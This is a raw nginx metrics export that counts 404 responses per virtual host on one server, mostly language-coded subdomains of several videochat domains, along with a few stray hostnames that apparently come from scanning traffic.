nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 804 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="757d6906-483e-45fa-b64f-440bc23e7d63.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="75z830.cc"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="773b50.cc:61234"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="91740527-lb.tcr2cx0u24o.app"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="9wrorcwwku.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="\\x5Clocalhost"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_atproto.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_bimi.videochat.mx"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_dmarc.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_mta-sts.videochat.mx"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="_tls.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="a87a9fc9-22f5-4827-aa21-6134a2f2ebb1.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="account.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="admin.videochat.mx"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.cafe"} 1463 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.date"} 446 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.mx"} 6756 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.show"} 350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.tv.br"} 2420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="af.videochat.world"} 3079 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="agobhsu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aivwnaz.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ajjsesv.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.cafe"} 2370 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.date"} 519 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.mx"} 4904 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.show"} 305 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.tv.br"} 1875 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="al.videochat.world"} 3740 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.cafe"} 2073 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.date"} 565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.mx"} 5048 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.show"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.tv.br"} 2322 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="am.videochat.world"} 4339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="amadorseniorcenter-oit.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ampwdba.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="aotconsultinghoro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.caonimavip.xyz"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.cliproxy.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="api.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="apiv4.9hits.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="app.videochat.mx"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.cafe"} 5866 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.date"} 326 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.mx"} 24140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.show"} 701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.tv.br"} 12434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ar.videochat.world"} 4718 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="asset.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="assets.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="atm.game"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.cafe"} 1669 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.date"} 344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.mx"} 6078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.show"} 454 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.tv.br"} 1555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="az.videochat.world"} 5235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.cafe"} 1720 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.date"} 497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.mx"} 5905 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.show"} 468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.tv.br"} 1469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ba.videochat.world"} 4425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="backend.videochat.mx"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bahisliona.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.cafe"} 3793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.date"} 826 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.mx"} 6370 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.show"} 291 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.tv.br"} 2178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="be.videochat.world"} 4069 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="beta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.cafe"} 2486 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.date"} 3640 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.mx"} 6425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.show"} 537 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.tv.br"} 2205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bg.videochat.world"} 5251 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="blog.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.cafe"} 1655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.date"} 1415 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.mx"} 5060 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.show"} 295 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.tv.br"} 2732 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bn.videochat.world"} 4859 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.cafe"} 1437 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.date"} 484 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.mx"} 4670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.show"} 552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.tv.br"} 1696 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bs.videochat.world"} 3925 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="bwfzopl.videochat.mx"} 530 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.cafe"} 1563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.date"} 155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.mx"} 3701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.show"} 382 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.tv.br"} 1668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ca.videochat.world"} 3725 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="caosyta.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cdn.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.cafe"} 1563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.date"} 1421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.mx"} 7485 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.show"} 398 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.tv.br"} 2564 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ceb.videochat.world"} 3322 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cf.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chitseyfamilydenhttjessicalovesdeno.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.cafe"} 1815 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.date"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.mx"} 5155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.show"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.tv.br"} 1700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="chm.videochat.world"} 3707 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cjrzvmn.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ckdbbet.videochat.mx"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cliproxy.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.cafe"} 2974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.date"} 3082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.mx"} 5421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.show"} 676 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.tv.br"} 2781 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cs.videochat.world"} 4213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="csbdigita72718ne.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.cafe"} 1824 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.date"} 988 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.mx"} 7105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.show"} 358 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.tv.br"} 2171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cy.videochat.world"} 4268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="cytjruk.videochat.mx"} 494 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="czcjxgl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="czhdzka.videochat.mx"} 578 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="d58nhnu7e7ghhg7jmok0.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="d58nhtm7e7ghhg7jmpeg.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.cafe"} 1959 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.date"} 3303 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.mx"} 4972 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.show"} 321 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.tv.br"} 4309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="da.videochat.world"} 3344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dashboard.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 620 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.cafe"} 1959 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.date"} 344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.mx"} 5919 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.show"} 358 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.tv.br"} 2042 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="de.videochat.world"} 3184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="demo.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dev.videochat.mx"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="duajeaf.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="dwpqqsi.videochat.mx"} 333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="edukhzh.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.cafe"} 1929 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.date"} 3608 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.mx"} 5147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.show"} 218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.tv.br"} 4338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ee.videochat.world"} 1636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eeiodfa.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="egbdcbg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.cafe"} 1705 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.date"} 453 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.mx"} 8232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.show"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.tv.br"} 3469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="el.videochat.world"} 3613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.cafe"} 1892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.date"} 238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.mx"} 7711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.show"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.tv.br"} 2462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="en.videochat.world"} 124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.cafe"} 2569 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.date"} 457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.mx"} 5773 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.show"} 387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.tv.br"} 1464 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eo.videochat.world"} 2826 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eqpuiba.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.cafe"} 2028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.date"} 5289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.show"} 606 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.tv.br"} 2581 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="es.videochat.world"} 4817 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.cafe"} 1587 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.date"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.mx"} 6125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.show"} 648 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.tv.br"} 1521 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="et.videochat.world"} 1406 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.cafe"} 1957 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.date"} 1261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.mx"} 6682 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.show"} 642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.tv.br"} 2024 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="eu.videochat.world"} 4459 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="example.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.cafe"} 1742 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.date"} 301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.mx"} 9966 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.show"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.tv.br"} 13513 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fa.videochat.world"} 6502 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.cafe"} 1435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.date"} 3335 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.mx"} 8652 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.show"} 2398 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.tv.br"} 3491 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fi.videochat.world"} 3791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="flfiomi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="forum.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.cafe"} 2182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.date"} 375 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.mx"} 5840 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.show"} 490 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.tv.br"} 2442 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fr.videochat.world"} 3026 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="fsgpqzh.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ftp.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.cafe"} 1991 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.date"} 686 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.mx"} 3914 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.show"} 622 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.tv.br"} 2178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ga.videochat.world"} 3364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="get.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.cafe"} 2641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.date"} 429 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.mx"} 5444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.show"} 298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.tv.br"} 4868 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gl.videochat.world"} 3675 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.cafe"} 1532 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.date"} 481 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.mx"} 5252 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.show"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.tv.br"} 1735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="gu.videochat.world"} 4025 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="harvestreako.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.cafe"} 1681 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.date"} 3682 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.mx"} 6342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.show"} 1162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.tv.br"} 2185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="he.videochat.world"} 4166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="help.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.cafe"} 1555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.date"} 4419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.mx"} 4790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.show"} 545 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.tv.br"} 2160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hi.videochat.world"} 4511 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hiqrnsk.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.cafe"} 1642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.date"} 4249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.mx"} 4821 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.show"} 2653 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.tv.br"} 2217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hr.videochat.world"} 4109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="hswxafi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.cafe"} 1928 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.date"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.mx"} 4181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.show"} 656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.tv.br"} 2106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ht.videochat.world"} 1675 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="httnl.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="httpbin.org"} 2 